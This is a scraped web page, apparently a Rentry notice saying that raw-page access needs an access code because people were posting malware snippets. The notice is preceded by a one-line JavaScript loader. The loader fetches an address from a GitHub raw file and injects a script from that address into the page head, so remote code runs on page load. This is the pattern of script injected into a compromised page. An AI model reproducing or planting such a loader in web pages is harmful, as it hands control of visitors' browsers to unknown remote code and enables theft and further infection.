;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); What

Access Code Required

Redirecting to page:

To access the raw version of this page, a valid access code must be set in the metadata: SECRET_RAW_ACCESS_CODE.

You may request an access code by emailing [email protected]

An access code may be used on any number of pages.

You may also use this access code as a header in your request, which will give you access to any post's /raw/ page.

This system was a necessary addition due to extensive misuse by bad actors posting malware snippets and getting us into a lot of trouble with our web hosts and domain registrars.

Example Metadata: SECRET_RAW_ACCESS_CODE = 12345

Example Header: rentry-auth : 12345

Return to Page